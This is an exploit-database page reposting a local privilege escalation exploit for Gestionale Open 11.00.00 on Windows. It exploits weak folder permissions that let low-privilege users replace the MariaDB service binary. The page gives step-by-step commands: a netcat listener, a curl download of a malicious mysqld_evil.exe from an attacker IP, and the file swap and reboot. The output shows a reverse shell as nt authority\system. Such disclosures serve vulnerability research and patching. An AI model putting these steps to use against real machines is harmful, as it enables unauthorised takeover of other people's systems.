Gestionale open 11.00.00 local privilege escalation Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-10-25 |
Type : local |
Platform : windows
This exploit / vulnerability Gestionale open 11.00.00 local privilege escalation is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Gestionale Open 11.00.00 - Local Privilege Escalation
# Date: 2021-07-19
# Author: Alessandro 'mindsflee' Salzano
# Vendor Homepage: https://www.gestionaleopen.org/
# Software Homepage: https://www.gestionaleopen.org/
# Software Link: https://www.gestionaleopen.org/wp-content/uploads/downloads/ESEGUIBILI_STANDARD/setup_go_1101.exe
# Version: 11.00.00
# Tested on: Microsoft Windows 10 Enterprise x64
With GO - Gestionale Open - it is possible to manage, check and print every aspect of accounting according to the provisions of Italian taxation.
Vendor: Gestionale Open srl.
Affected version: > 11.00.00
# Details
# By default the Authenticated Users group has the modify permission to Gestionale Open folders/files as shown below.
# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
The application also have unquoted service path issues.
(1) Impacted services.
Any low privileged user can elevate their privileges abusing MariaDB service:
2. Setup listener and ensure apache is running on attacking machine
nc -lvp 4242
service apache2 start
3. Download malicious .exe on victim machine
type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Gestionale_Open\MySQL57\bin\mysqld_evil.exe"
4. Overwrite file and copy malicious .exe.
Renename C:\Gestionale_Open\MySQL57\bin\mysqld.exe > mysqld.bak
Rename downloaded 'mysqld_evil.exe' file in mysqld.exe
5. Restart victim machine
6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system
Gestionale open 11.00.00 local privilege escalation